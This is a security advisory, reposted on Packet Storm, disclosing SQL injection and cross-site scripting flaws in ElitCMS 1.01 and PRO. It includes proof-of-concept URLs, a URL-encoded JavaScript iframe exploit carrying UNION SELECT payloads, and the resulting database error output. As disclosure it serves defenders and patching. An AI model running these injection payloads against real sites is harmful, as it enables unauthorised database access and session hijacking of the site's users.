what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Elite Graphix ElitCMS 1.01 / PRO Cross Site Scripting / SQL Injection

Elite Graphix ElitCMS 1.01 / PRO Cross Site Scripting / SQL Injection
Posted Oct 18, 2013
Authored by Katharina S.L., Vulnerability Laboratory | Site vulnerability-lab.com

Elite Graphix ElitCMS versions 1.01 and PRO suffer from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 29a67e3663b1e3c4862f2246b9ede7002b3897ace31e2a0b390b8b8838c2db15

Elite Graphix ElitCMS 1.01 / PRO Cross Site Scripting / SQL Injection

Change Mirror Download
Document Title:
===============
Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1117


Release Date:
=============
2013-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
1117


Common Vulnerability Scoring System:
====================================
8.3


Product & Service Introduction:
===============================
Elite CMS is a web content management system made for the peoples who don`t have much technical knowledge of HTML or
PHP but know how to use a simple notepad with computer keyboard. Elite CMS Pro is a successor of the eliteCMS .

Elite CMS was made available free to public last year i.e. 2008. Since then i have received hundreds of appreciation
email from the users of eliteCMS world wide. Some user of my eliteCMS want some more robust and powerful features.
Due to the huge response from the users i have decided to write pro edition of eliteCMS.

All new features in pro edition of the eliteCMS is based on the feedbacks and suggestions made by users of eliteCMS
- The Lightweight CMS. Some users suggested that eliteCMS should have multilevel menu navigation with sub pages support,
some suggested multiple web forms support for cms pages, some want more flexible and easy to understand template system.

(Copy of the Homepage: http://elitecms.net/elitecmspro.php )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Elite-Graphix `ElitCMS` v1.01 web-application.


Vulnerability Disclosure Timeline:
==================================
2013-10-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Elite Graphix
Product: ElitCMS - Web Application 1.01


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
A remote sql injection web vulnerability is detected in the official Elite-Graphix `ElitCMS` v1.01 web-application.
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the application dbms.

The vulnerability is located in the `page` value of the index.php file. Remote attackers are able to inject own sql
commands in the page parameter GET method request to compromise the database management system or web-application.
The issue is a classic order by sql injection vulnerability.

Exploitation of the sql injection web vulnerability requires no user interaction or privileged application user account.
Successful exploitation of the sql injection bug results in database management system and web-application compromise.


Vulnerable Module(s):
[+] Index

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page



1.2
A client-side post inject web vulnerability is detected in the official Elite Graphix ElitCMS v1.01 web-application.
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).

The vulnerability is located in the contact form module of the application in the name value parameter. Remote attackers
can inject own malicious persistent script codes as name value in the contact form when processing to send via POST method.
The script code execute occurs in the thanks page in the context of the echo name value.

Successful exploitation of the client-side POST inject web vulnerability results in session hijacking, client-side phishing,
client-side unauthorized external redirects and client-side manipulation of the contact formular module context.


Vulnerable Module(s):
[+] Contact Formular

Vulnerable File(s):
[+] page

Vulnerable Parameter(s):
[+] name


Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerability can be exploited by remote attackers without privileged application user account
and also without user interaction. For demonstration or to reproduce ...

PoC: #1 - Standard Edition
http://elit.localhost:8080/elitecms/index.php?page=-1%27[ORDER BY SQL INJECTION VULNERABILITY!]--


Exploit:

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EElit%20CMS%20v1.01%20-
%20SQL%20Injection%20PoC#1-StandardEdition%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//cms.localhost%3A8080/elitecms/index.php%3F
page%3D3%27union%20select%20all%201%2C2%2Cx%2Cx%2Cx%2Cx%2C--%20%20width%3D%22733%22%20height%3D%22733%22%3E%0A%3C/
body%3E%3C/head%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


--- DBMS SQL Exception Logs ---
Database Query failed !
Check Database Settings.
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1


PoC: #2 - PRO Edition
http://elit.localhost:8080/index.php?mpage=3&subpage=-1%27[ORDER BY SQL INJECTION VULNERABILITY!]--

<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EElitCMS%20v1.01%20-
%20SQL%20Injection%20PoC%232%20PRO%20Edition%3C/title%3E%0A%3Ciframe%20src
%3Dhttp%3A//elit.localhost%3A8080/index.php%3Fmpage%3D3%26subpage%3D-7%27union%20select%201%2C2%2C3
%2Cx%2Cx%2Cx%2Cx%2C@@version%2Cx--%3E%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>


--- DBMS SQL Exception Logs ---
Database Query failed !
Check Database Settings.
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '-'''' at line 1



1.2
The client-side post inject web vulnerability can be exploited by remote attackers without privileged application user account
and with low or medium user interaction. For demonstration or reproduce ...


PoC: Thanks - (Page echo with vulnerable Name value)

<div id="content">
<h1>Contact Information</h1>
<p id="eq3">Feel free to contact us with your feedbacks .<br><br>Use contact form below to send us quick email.<br></p>
<div class="ctFrmHd">-: Contact Form :-</div>
<span class="successMsg">Thank you dear <span>>"<<"<><>"<[CLIENT-SIDE INJECTED SCRIPT CODE VIA POST!]"></span>
your message has been send successfully.</span><form name="contactForm" method="post" action="">
<table width="419" border="0" cellpadding="8" cellspacing="0" id="contcatFormTbl">
<tr>
<td width="88"> Name :</td>
<td width="304"><input type="text" name="name" id="name" class="frmInput" value=">"<[CLIENT-SIDE INJECTED SCRIPT CODE VIA POST!]>"/></td>
</tr>


Note: As default the page=3 is available as contact formular but it can also be located in other module of the elit-cms.


Reference(s):
http://elit.localhost:8080/elitecms/index.php?page=3


Solution - Fix & Patch:
=======================
1.1
The sql injection web vulnerability can be patched by the implement of a secure statement to the page value and index.php file.
Also restrict the page value request and ensure the output is secure encoded.
Disallow the display of sql debug/errors logs in the cms main context. Setup a own module to log sql errors in the acp.

1.2
The client-side post inject web vulnerability can be patched by a secure parse and encode of the name value in the post method request
and the thanks page echo message.


Security Risk:
==============
1.1
The security risk of the sql injection web vulnerability is estimated as critical.

1.2
The security risk of the client-side post inject web vulnerability is estimated as low(+)|(-)medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close